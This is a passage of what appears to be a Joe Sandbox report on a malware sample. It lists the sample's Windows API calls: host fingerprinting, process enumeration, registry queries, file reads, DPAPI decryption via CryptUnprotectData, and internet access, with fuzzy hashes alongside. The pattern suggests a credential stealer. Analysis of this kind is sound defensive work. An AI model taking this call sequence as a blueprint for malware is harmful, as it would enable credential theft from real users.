                                                                                                                                                                                                                                • Part of subcall function 004144B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,02F650C8,00000000,?,0041D758,00000000,?,00000000,00000000,?,02F65B90,00000000), ref: 004144C0
                                                                                                                                                                                                                                • Part of subcall function 004144B0: HeapAlloc.KERNEL32(00000000), ref: 004144C7
                                                                                                                                                                                                                                • Part of subcall function 004144B0: GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
                                                                                                                                                                                                                                • Part of subcall function 00414530: GetUserDefaultLocaleName.KERNEL32(00000000,00000055,00000000,00000000,?,02F650C8,00000000,?,0041D758,00000000,?,00000000,00000000,?,02F65B90,00000000), ref: 00414542
                                                                                                                                                                                                                                • Part of subcall function 00414570: GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
                                                                                                                                                                                                                                • Part of subcall function 00414570: LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
                                                                                                                                                                                                                                • Part of subcall function 00414570: GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
                                                                                                                                                                                                                                • Part of subcall function 00414570: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
                                                                                                                                                                                                                                • Part of subcall function 00414570: LocalFree.KERNEL32(00000000), ref: 004146DF
                                                                                                                                                                                                                                • Part of subcall function 00414710: GetSystemPowerStatus.KERNEL32(00000000), ref: 0041471A
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,02F659D0,00000000,?,0041D76C,00000000,?,00000000,00000000,?,02F65500,00000000,?,0041D768,00000000), ref: 0041037E
                                                                                                                                                                                                                                • Part of subcall function 00415B70: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
                                                                                                                                                                                                                                • Part of subcall function 00415B70: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
                                                                                                                                                                                                                                • Part of subcall function 00415B70: CloseHandle.KERNEL32(00000000), ref: 00415BAF
                                                                                                                                                                                                                                • Part of subcall function 00414740: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
                                                                                                                                                                                                                                • Part of subcall function 00414740: HeapAlloc.KERNEL32(00000000), ref: 0041475B
                                                                                                                                                                                                                                • Part of subcall function 00414740: RegOpenKeyExA.KERNEL32(80000002,02F5C500,00000000,00020119,00000000), ref: 0041477B
                                                                                                                                                                                                                                • Part of subcall function 00414740: RegQueryValueExA.KERNEL32(00000000,02F65B30,00000000,00000000,000000FF,000000FF), ref: 0041479C
                                                                                                                                                                                                                                • Part of subcall function 00414740: RegCloseKey.ADVAPI32(00000000), ref: 004147A6
                                                                                                                                                                                                                                • Part of subcall function 00414800: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00414846
                                                                                                                                                                                                                                • Part of subcall function 00414800: GetLastError.KERNEL32 ref: 00414855
                                                                                                                                                                                                                                • Part of subcall function 004147C0: GetSystemInfo.KERNEL32(00000000), ref: 004147CD
                                                                                                                                                                                                                                • Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147E3
                                                                                                                                                                                                                                • Part of subcall function 00414960: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,02F65518,00000000,?,0041D774,00000000,?,00000000,00000000,?,02F65560), ref: 0041496D
                                                                                                                                                                                                                                • Part of subcall function 00414960: HeapAlloc.KERNEL32(00000000), ref: 00414974
                                                                                                                                                                                                                                • Part of subcall function 00414960: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
                                                                                                                                                                                                                                • Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149AF
                                                                                                                                                                                                                                • Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149BD
                                                                                                                                                                                                                                • Part of subcall function 00414960: wsprintfA.USER32 ref: 004149E9
                                                                                                                                                                                                                                • Part of subcall function 00414ED0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
                                                                                                                                                                                                                                • Part of subcall function 00414ED0: HeapAlloc.KERNEL32(00000000), ref: 00414F23
                                                                                                                                                                                                                                • Part of subcall function 00414ED0: wsprintfA.USER32 ref: 00414F3D
                                                                                                                                                                                                                                • Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,02F63390,00000000,00020019,00000000,0041D289), ref: 00414B41
                                                                                                                                                                                                                                • Part of subcall function 00414AE0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                                                                                                                                                • Part of subcall function 00414AE0: wsprintfA.USER32 ref: 00414BF6
                                                                                                                                                                                                                                • Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                                                                                                                                                • Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                                                                                                                                                • Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                                                                                                                                                • Part of subcall function 00414DE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
                                                                                                                                                                                                                                • Part of subcall function 00414DE0: Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
                                                                                                                                                                                                                                • Part of subcall function 00414DE0: Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
                                                                                                                                                                                                                                • Part of subcall function 00414DE0: FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041095B
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02F61B90), ref: 00404ED9
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$Process$Alloc$CloseOpen$wsprintf$Namelstrcpy$InformationLocallstrlen$CurrentInfoKeyboardLayoutListLocaleProcess32QueryStatusSystemTimeUserValue__aulldivlstrcat$ChangeComputerCreateDefaultDirectoryEnumErrorFileFindFirstFreeGlobalHandleInternetLastLogicalMemoryModuleNextNotificationPowerProcessorSnapshotToolhelp32VolumeWindowsWow64Zone
                                                                                                                                                                                                                              • String ID: E.A
                                                                                                                                                                                                                              • API String ID: 1035121393-2211245587
                                                                                                                                                                                                                              • Opcode ID: 8c5e8baee51fe039dedb06812f184ffe25ed167e737ed22b87c4161df0bcc578
                                                                                                                                                                                                                              • Instruction ID: c29c4d19e1a1d8256a8b8cfc17993bd3f91cdea4a247a897ffed86f061f16859
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c5e8baee51fe039dedb06812f184ffe25ed167e737ed22b87c4161df0bcc578
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9372B076D10118AACB15FB91EC91EDEB73DAF14308F51439FB01662491EF346B89CBA8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 00411378
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0041146F
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02F60C98,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpystrtok_s$lstrlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3184129880-0
                                                                                                                                                                                                                              • Opcode ID: 065d792216242c25af7b61e5e9a9c488338e4d9e1012c18c005135395daaae49
                                                                                                                                                                                                                              • Instruction ID: bc44fb65e395c18893d79e2daadfc8d7f4384440e0cba23ba4018ddaa6f79c9f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 065d792216242c25af7b61e5e9a9c488338e4d9e1012c18c005135395daaae49
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 04417175D00208DBCB04EFE5D855AEEBB75BF48304F00811EE51177290EB38AA85CFA9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                • Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,02F65758), ref: 0040971B
                                                                                                                                                                                                                                • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
                                                                                                                                                                                                                                • Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
                                                                                                                                                                                                                                • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
                                                                                                                                                                                                                                • Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F
                                                                                                                                                                                                                              • memcmp.MSVCRT ref: 00409774
                                                                                                                                                                                                                                • Part of subcall function 00409540: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
                                                                                                                                                                                                                                • Part of subcall function 00409540: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
                                                                                                                                                                                                                                • Part of subcall function 00409540: LocalFree.KERNEL32(?), ref: 004095AF
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Local$Alloc$CryptFileFree$BinaryString$ChangeCloseCreateDataFindNotificationReadSizeUnprotectlstrcpymemcmp
                                                                                                                                                                                                                              • String ID: $DPAPI
                                                                                                                                                                                                                              • API String ID: 2647593125-1819349886
                                                                                                                                                                                                                              • Opcode ID: d3a65021009ca582ddf87a55df3f4c114bb092f76f06acd42443a219e503715e
                                                                                                                                                                                                                              • Instruction ID: 25d6f3248392bfa9bca68fd769027b68fff5740b7e0b7820d89104a1b18a6e16
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d3a65021009ca582ddf87a55df3f4c114bb092f76f06acd42443a219e503715e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 493141B6D10108EBCF04DF94DC45AEFB7B9AF48704F14452DE905B3292E7389A44CBA5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
                                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
                                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy$Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3491751439-0
                                                                                                                                                                                                                              • Opcode ID: 874ae79ec3e8192fa23909c5db076f4d3e0dbc31e37d4715c99de52b0292d680
                                                                                                                                                                                                                              • Instruction ID: b51d58226d22fc07b4aaea4bdcaba1b12d12dab42e387443cd86e66b2ce9f1c4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 874ae79ec3e8192fa23909c5db076f4d3e0dbc31e37d4715c99de52b0292d680
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED211D759002189BCB24EB61DC95FDEB779AF54304F1041DAA50A66190DF38AFC5CF94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00411879,80000000,00000003,00000000,00000003,00000080,00000000,?,00411879,?), ref: 004159FC
                                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(000000FF,00411879), ref: 00415A19
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 00415A27
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1378416451-0
                                                                                                                                                                                                                              • Opcode ID: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
                                                                                                                                                                                                                              • Instruction ID: adbcd47bb22ca6d6b42933acd4cabc8e10c5a14c322029dfd4b487fe3fd33794
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9F03139F44604FBDB20DBF0DC85BDE7779BF44710F118255B951A7280DA7496428B44
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02F60C98,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004137B9
                                                                                                                                                                                                                              • Sleep.KERNEL32(00001770), ref: 004137C4
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,?,02F60C98,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004137E2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 941982115-0
                                                                                                                                                                                                                              • Opcode ID: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
                                                                                                                                                                                                                              • Instruction ID: 00ad45554361a1bf9ffb836df5d455c5d00fe00f471bf70531fad30136aebd8c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5FF054B0944206AAE720AFA1DD05BFE7675BB08B46F10851AF612951C0DBB856818A5D
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: Pi@
                                                                                                                                                                                                                              • API String ID: 0-1360946908
                                                                                                                                                                                                                              • Opcode ID: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
                                                                                                                                                                                                                              • Instruction ID: 3e1b1374d11ee30af11b8018be346ecc1401931fa3badc01db0dac5c56ce0c6a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 756105B5D00208DBDB14DF94D984BEEB7B0AB48304F1185AAE80677380D739AEA5DF95
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CrackInternetlstrlenmalloc
                                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                                              • API String ID: 3848002758-4251816714
                                                                                                                                                                                                                              • Opcode ID: 10fbe9eb2742df883d3b203e3e4fd63634fe2657fb2e0349a2fcbdd6249fe704
                                                                                                                                                                                                                              • Instruction ID: 4ed07355fbd84ea2b0e25782c0c6f45789bb77a73037a8222357df496ca5bcbd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 10fbe9eb2742df883d3b203e3e4fd63634fe2657fb2e0349a2fcbdd6249fe704
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52216DB1D00208ABDF10EFA5E845BDD7B74AB44324F008229FA25B72C0EB346A46CB95
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,02F618C0), ref: 0040EFCE
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,02F618E0), ref: 0040F06F
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,02F61930), ref: 0040F17E
                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3722407311-0
                                                                                                                                                                                                                              • Opcode ID: 8882f6fc2c5f91f777fc6c73b58a887527dd2ea75ec50127e14f13b7a0b7f144
                                                                                                                                                                                                                              • Instruction ID: 4355cab003f180362ea4467312be264c8b2230b95154913c46dc9b5fce20c885
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8882f6fc2c5f91f777fc6c73b58a887527dd2ea75ec50127e14f13b7a0b7f144
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D719871B002099BCF08FF75D9929EEB77AAF94304B10852EF4099B285EA34DE45CBC5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,02F618C0), ref: 0040EFCE
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,02F618E0), ref: 0040F06F
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,02F61930), ref: 0040F17E
                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy
                                                                                                                                                                                                                              • String ID:
